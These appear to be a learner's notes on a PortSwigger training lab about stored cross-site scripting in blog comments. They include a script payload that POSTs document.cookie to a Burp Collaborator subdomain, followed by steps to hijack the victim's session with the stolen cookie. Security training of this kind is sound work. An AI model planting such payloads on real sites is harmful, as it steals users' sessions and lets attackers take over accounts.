Below are detailed notes demonstrating how to practically [exploit stored](https://portswigger.net/web-security/cross-site-scripting/exploiting/lab-stealing-cookies) Cross-Site Scripting (XSS) in blog comments to steal cookies, using _Burp Suite Professional_ and _Burp Collaborator_.
##### **Step-by-step Exploitation**
**1. Identifying the XSS Vulnerability**
- The vulnerable function is the **blog comments** form.
- Initial validation confirms the insertion of arbitrary HTML tags like `<u>` is possible, indicating a stored XSS vulnerability.
Example test payload:
```html
<u>test</u>
```
This confirms HTML injection.
![[CleanShot 2025-04-12 at 12.35.12.png]]
---
**2. Setting up Burp Collaborator**
- In **Burp Suite Professional**, navigate to:
```
Burp Suite → Collaborator Tab → Copy to clipboard
```
- Your unique Collaborator domain will look like:
```
yoursubdomain.burpcollaborator.net
```
---
**3. Crafting and Deploying the Exploit Payload** Use a JavaScript payload to fetch and exfiltrate the victim's cookie to Burp Collaborator. Example payload:
```html
<script>
fetch('https://yoursubdomain.burpcollaborator.net', {
method: 'POST',
mode: 'no-cors',
body: document.cookie
});
</script>
```
- Replace `yoursubdomain.burpcollaborator.net` with your copied Collaborator subdomain.
Submit this script as a new blog comment.
---
**4. Triggering the Exploit**
- When a victim (simulated user) visits the blog comments page, their browser automatically executes your injected JavaScript payload.
- The victim’s session cookie is silently POSTed to your Collaborator subdomain.
![[CleanShot 2025-04-12 at 12.37.16.png]]
---
**5. Retrieving the Cookie**
- In **Burp Collaborator** tab:
```
Click “Poll now” to view incoming HTTP requests.
```
- You will see an HTTP interaction containing the stolen cookie within the POST body.
- Record the victim’s cookie value, for example:
```
session=abcd1234efgh5678ijkl9012mnop3456;
```
![[CleanShot 2025-04-12 at 12.37.49.png]]
---
**6. Session Hijacking**
- Replace your browser session cookie with the stolen victim cookie
- At the time of writing a like [Cookie-Editor](https://chromewebstore.google.com/detail/hlkenndednhfkekhgcdicdfddnkalmdm?utm_source=item-share-cb) best for it's simplicity
![[CleanShot 2025-04-12 at 12.39.15.png]]
- Successful impersonation typically redirects you to the victim’s (e.g., admin's) account page.
![[CleanShot 2025-04-12 at 12.40.24.png]]